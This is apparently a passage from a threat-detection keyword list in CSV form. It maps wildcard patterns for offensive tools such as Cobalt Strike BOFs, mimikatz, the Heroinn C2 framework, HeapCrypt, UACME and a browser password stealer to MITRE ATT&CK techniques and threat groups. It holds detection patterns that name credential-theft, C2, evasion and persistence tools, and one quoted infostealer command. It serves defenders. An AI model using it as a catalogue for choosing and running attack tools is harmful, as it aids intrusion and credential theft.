T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*headers/exploit.h*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*headers/HandleKatz.h*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,, +"*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*","greyware_tool_keyword","ducktail","infostealer command to retrieve public ip address","T1596 - T1590.005","TA0043 - TA0007 - TA0009","Ducktail ","N/A","Reconnaissance","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*HeapCrypt-main*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*HeapEncryptDecrypt.cpp*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*HeapEncryptDecrypt.exe*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*HeapEncryptDecrypt.sln*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*HeapEncryptDecrypt.vcxproj*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" +"*HeartBleed*","offensive_tool_keyword","HeartBleed","Heart Bleed scanner ","T1222 - T1110 - T1046","TA0007 - TA0001 - TA0002","N/A","N/A","Web Attacks","https://github.com/TechnicalMujeeb/HeartBleed","1","0","N/A","N/A","1","26","4","2018-04-14T04:21:39Z","2018-04-14T04:06:16Z" +"*hekatomb-*.tar.gz*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*hekatomb*-hashes *","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*hekatomb-*-py3-none-any.whl*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*hekatomb@thiefin.fr*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*hekatomb_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Hello from DCShadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Hello From sadsad Team*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*HelloReflectionWorld.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*hellsgate.asm*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*HellsGate.exe*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*HellsGate.sln*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*HellsGate.vcxproj*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" +"*help\dll.txt*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*helpers.gpoddity_smbserver*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*Henkru/cs-token-vault*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*henry-richard7/Browser-password-stealer*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*Heroinn FTP*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*heroinn_client*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*heroinn_core*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*heroinn_ftp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*heroinn_shell*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*heroinn_util*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*HeroinnApp*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*HeroinnProtocol*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*HeroinnServerCommand*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*hfiref0x/UACME*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*hfiref0x/WDExtract*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*hhdobjgopfphlmjbmnpglhfcgppchgje*","greyware_tool_keyword","AdGuard VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Hibr2Dmp.exe*","offensive_tool_keyword","Hibr2Dmp","Convert hiberfil.sys to a dump file with hibr2dmp (can be used with windbg to exploit lsass dump)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" +"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*HideProcess*","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","5","499","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z" +"*higioemojdadgdbhbbbkfbebbdlfjbip*","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*hijack_hunter *","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" +"*hijack_remote_thread*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*hijackablepath.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*hijackablepath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" +"*hijackCLSIDpersistence.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*Hijacker*","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" +"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" 